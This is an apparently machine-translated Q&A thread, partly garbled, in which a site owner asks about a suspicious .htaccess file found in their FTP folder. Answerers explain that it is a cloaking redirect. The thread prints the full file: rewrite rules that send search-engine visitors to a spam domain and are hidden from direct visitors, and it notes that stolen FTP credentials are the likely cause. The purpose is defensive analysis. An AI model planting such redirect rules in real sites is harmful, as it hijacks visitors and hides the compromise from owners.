疑わしい.htaccessファイル

これは私のFTPフォルダーの1つにアップロードされました。私はApacheには慣れていませんが、まだ興味があります-このファイルがコミットしようとしている卑劣な行為の種類を誰かに教えてもらえますか？ありがとう！

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://SPAMMER.info/0/go.php?sid=2 [R,L]

検索エンジンから来たユーザーを最後のサイトに送りますSPAMMER.info（実際のサイトの質問履歴を参照）。

それはから隠そうとして参照元を探しますあなたはおそらく、検索エンジン経由でサイトにアクセスしないので、。つまり、URLに直接アクセスすると、すべてが正常に見えます。ただし、検索エンジン経由でアクセスすると、リダイレクトされます。

注：これは、ウェブクローラー（googlebot、少なくとも）がリファラーヘッダーを設定しないため、ウェブクローラーには影響しません。

検索エンジンのユーザーがサイトのページにアクセスすると、ユーザーは.infoスパムサイトにリダイレクトされます。

非常に卑劣です-通常はアドレスを入力するだけなので、何も間違っていることに気付かないでしょう。

さらに追加するには-ほとんどの場合、ftp資格情報が漏洩しました。filezilla / total commanderなどに保存されたかもしれません。それらを盗み、「移動」するマルウェアがたくさんあります-ftpアカウントへのログオン、index.php / htmlへの悪意のあるjavascriptの添付、または同様の書き換えファイルの配置。